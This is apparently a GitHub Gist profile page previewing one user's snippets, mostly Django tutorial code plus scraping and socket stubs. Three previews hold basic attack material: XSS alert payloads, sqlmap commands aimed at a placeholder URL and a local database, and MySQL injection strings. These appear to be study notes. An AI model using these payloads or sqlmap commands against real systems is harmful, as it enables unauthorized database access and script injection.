Skip to content

Instantly share code, notes, and snippets.

Avatar
🎯
Focusing

Xifeng2009 Xifeng2009

🎯
Focusing
View GitHub Profile
View Ajax
# In app/views.py
import random
from django.http import JsonResponse
def ajax_1(request):
context = {"data": random.randint(1, 999)}
return JsonResponse(context)
# In templates
<input id="a1" value="AAA">
<button id="b1" class="button">Click!</button>
View Base4 of MTV: POST
# In app/forms.py
from django import forms
from .models import Topic
class TopicForm(forms.ModelForm):
class Meta:
model = Topic
fields = ['title', 'text']
labels = {
'title': 'Title: ',
'text': 'Text: ',
View Base3 of MTV: Foreign Key
# In models.py
class Comment(models.Model):
topic = models.ForeignKey(Topic)
comment = models.CharField(max_length=200, null=True, blank=True, verbose_name='评论')
date_added = models.DateTimeField(auto_now_add=True, verbose_name='创建时间')
class Meta:
verbose_name_plural = 'comments'
def __str__(self):
return self.comment[:10]
View Base2 of MTV: ORM
# In settings.py
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql',
'NAME': 'mysql',
'USER': 'root',
'PASSWORD': 'YOUR PASSWORD',
'HOST': '127.0.0.1',
'PORT': '3306',
}
View Base of MTV
# In project/urls.py
from django.conf.urls import url, include
urlpatterns = [
url(r'', include('main.urls', namespace='main')),
]
# In app/urls.py
from django.conf.urls import url
from . import views
View XSS: Payload
<script>alert(123);</script>
<ScRipT>alert("XSS");</ScRipT>
<script>alert(123)</script>
<script>alert("hellox worldss");</script>
<script>alert(“XSS”)</script>
<script>alert(“XSS”);</script>
<script>alert(‘XSS’)</script>
“><script>alert(“XSS”)</script>
<script>alert(/XSS”)</script>
<script>alert(/XSS/)</script>
View SQLMAP: 目标&请求
#1 根据url进行注入 -u
sqlmap -u "http://www.target.com/vuln.php?id=1" -f --banner --dbs --users
# 输出详细等级
-v [1-7]
-v/-vv/-vvv/-vvvv
#2 直连数据库 -d
sqlmap -d "mysql://admin:admin@192.168.21.17:3306/testdb" -f --banner --dbs --users
View SQL Injection: MySQL
#1 判断盲注
1 and 1=2
1 and 1=1
#2 整型注入
1 or 1=1 #
#3 字符型注入
1' or 1=1 #
View BeautifulSoup
# 文档
https://beautifulsoup.readthedocs.io/zh_CN/v4.4.0/
import requests
from bs4 import BeautifulSoup
all_url = 'http://www.mzitu.com/all/'
start_html = requests.get(all_url, headers=headers)
Soup = BeautifulSoup(start_html.text, "lxml") # 解析器:html.parser, lxml-xml, xml, html5lib
# 获取a标签的链接
View Socket: Server
import socket
import threading
class Connection:
def __init__(self, cid, conn, addr):
self.cid = cid
self.conn = conn
self.addr = addr
You can’t perform that action at this time.